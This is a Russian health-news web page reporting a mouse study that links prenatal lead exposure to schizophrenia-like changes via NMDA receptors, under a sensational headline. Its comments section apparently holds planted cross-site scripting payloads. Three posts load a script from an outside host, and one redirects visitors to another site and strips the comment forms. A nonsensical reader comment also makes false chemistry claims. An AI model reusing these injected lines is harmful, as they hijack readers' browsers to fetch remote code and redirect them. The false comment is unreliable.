Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Хотите заболеть шизофрени...  >>  Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению
 
Обратная связь
 

Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению

Размер шрифта
23 июля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Шизофрения – распространенное психическое заболевание, приводящее к инвалидизации пациента. Эта болезнь плохо лечится, во многом потому что причины и факторы развития шизофрении изучены недостаточно. Но последнее исследование говорить том, что вы можете управлять своей жизнью и избежать этой болезни.

Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению

В 2004 году ученые из Колумбийского университета, США выявили связь между свинцовой интоксикацией плода в пренатальном периоде и повышенным риском развития шизофрении в будущем. Однако без ответа оставался важный вопрос: каков механизм этого явления? Чтобы это выяснить, Томас Гиларт, глава исследовательской группы, решил провести новую научную работу.

Выяснилось, что свинец обладает прямым блокирующим действием на так называемые NMDA-рецепторы. Это особые белки, участвующие в передачи нервных импульсов в мозге и играющие важную роль в таких процессах, как обучение и память. Естественным активатором этих рецепторов является аминокислота глутамат.

Согласно одной из гипотез, развитие шизофрении связано с нарушением глутамат-опосредованных процессов в мозге и, в частности, с дисфункцией NMDA-рецепторов. Это и есть звено, связывающее свинец и шизофрению.

Мышиная возня

В данном исследовании доктор Гиларт и его коллеги использовали мышь в качестве лабораторной модели. Животных разделили на две большие группы. В одной были обычные мыши, в другой – генно-модифицированные. В геном животных был встроен ген DISC1, который, как считается, ассоциирован с повышенным риском развития шизофрении у людей.

Обе большие группы мышей были, в свою очередь, разделены на две маленькие: в одной животных подвергали воздействию свинца во время внутриутробного периода, а в другой – нет.

Все мыши в дальнейшем были исследованы с помощью магнитно-резонансной томографии и ряда поведенческих тестов.

Мутантные «свинцовые» животные демонстрировали чрезмерный уровень активности после воздействия психостимуляторов. Кроме того, они выказали неспособность подавить страх, возникающий в ответ на громкий звук. С точки зрения анатомии нервной системы эти мыши также имели характеристическую особенность: у них были расширены боковые желудочки головного мозга (это полости, заполненные ликвором – спинномозговой жидкостью).

Генетика + среда = ?

Роль генетических факторов в развитии шизофрении и других психических заболеваний давно и прочно установлена, значимость же внешних факторов только начинает оцениваться медицинским сообществом.

«Наше открытие нас впечатлило, но невозможно отрицать, что мы всего лишь прошлись по самым вершкам», – рассказывает Гиларт. «Мы смогли оценить роль свинца, но ведь существует множество других токсинов, потенциально способных нарушить функцию NMDA-рецепторов. Например, полициклические ароматические углеводороды, которыми загрязнена атмосфера. Кроме того, и другие гены могут быть вовлечены в патологический процесс, помимо DISC1».

Новое исследование говорит о том, что здоровье детей абсолютно полностью зависит от их родителей. Оберегайте и заботьтесь о ваших детях. И они будут здоровы и сильны, чтобы в старости заботиться о вас.

Узнайте все о том, как подготовиться к беременности в нашем специальном проекте «Ребенок будет».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

04 ноября 2013 в 06:36

Цитировать   |   Пожаловаться

Здравствуйте!При шизофрении лечат литием,а PbLi-это молоко,мо-

жет вам делать нечего как считать,что свинец не поддерживает мышление,единственный элемент,который не скажет,что умный-раз-
ведчик Астат,он и скромен-Влад Крашенинников,Барнаул,участок Гу-
товой.

2 - zzzzzz

30 июня 2015 в 19:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему магазины могут обмануть людей, но не обезьян?   У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?   Московский музей «Живые системы» приглашает всех   Селфи убивает больше людей, чем акулы!  
22 июля 2013Хотите заболеть шизофренией – попробуйте свинец! Свинец вызывает шизофрению 19 июля 2013У вашего мужа в 3 раза больше шансов совершить самоубийство! А какой шанс у вас?
 
06 июня 2013Ваши сопли скажут, сумасшедший ли вы 01 ноября 2013ИНВИТРО – «Марка №1» в России
 

Слайдшоу

1
Грусть или смертельная болезнь
Астма! Когда бежать к врачу?
Можно ли беременеть после 40?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.